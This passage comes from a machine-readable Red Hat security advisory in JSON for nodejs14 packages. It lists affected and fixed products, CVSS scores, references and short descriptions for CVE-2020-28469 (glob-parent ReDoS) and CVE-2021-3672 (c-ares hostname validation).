"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-ini: Prototype pollution via malicious INI file" }, { "cve": "CVE-2020-28469", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-04-01T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1945459" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-glob-parent. The enclosure regex used to check for glob enclosures containing backslashes is vulnerable to Regular Expression Denial of Service attacks. This flaw allows an attacker to cause a denial of service if they can supply a malicious string to the glob-parent function. The highest threat from this vulnerability is to system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-glob-parent: Regular expression denial of service", "title": "Vulnerability summary" }, { "category": "other", "text": "While some components do package a vulnerable version of glob-parent, access to them requires OpenShift OAuth credentials and hence have been marked with a Low impact. This applies to the following products:\n - OpenShift Container Platform (OCP)\n - OpenShift ServiceMesh (OSSM)\n - Red Hat Advanced Cluster Management for Kubernetes (RHACM)\n - OpenShift distributed tracing", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" ], "known_not_affected": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-28469" }, { "category": "external", "summary": "RHBZ#1945459", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1945459" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-28469", "url": "https://www.cve.org/CVERecord?id=CVE-2020-28469" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-28469", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28469" }, { "category": "external", "summary": "https://snyk.io/vuln/SNYK-JS-GLOBPARENT-1016905", "url": "https://snyk.io/vuln/SNYK-JS-GLOBPARENT-1016905" } ], "release_date": "2021-01-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-08-26T10:21:32+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:3280" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-glob-parent: Regular expression denial of service" }, { "cve": "CVE-2021-3672", "cwe": { "id": "CWE-79", "name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)" }, "discovery_date": "2021-07-30T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1988342" } ], "notes": [ { "category": "description", "text": "A flaw was found in c-ares library, where a missing input validation check of host names returned by DNS (Domain Name Servers) can lead to output of wrong hostnames which might potentially lead to Domain Hijacking. The highest threat from this vulnerability is to confidentiality and integrity as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "c-ares: Missing input validation of host names may lead to domain hijacking", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ], "known_not_affected": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-3672" }, { "category": "external", "summary": "RHBZ#1988342", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1988342" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-3672", "url": "https://www.cve.org/CVERecord?id=CVE-2021-3672" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-3672", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3672" }, { "category": "external", "summary": "https://c-ares.haxx.se/adv_20210810.html", "url": "https://c-ares.haxx.se/adv_20210810.html" } ], "release_date": "2021-08-10T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-08-26T10:21:32+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:3280" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", 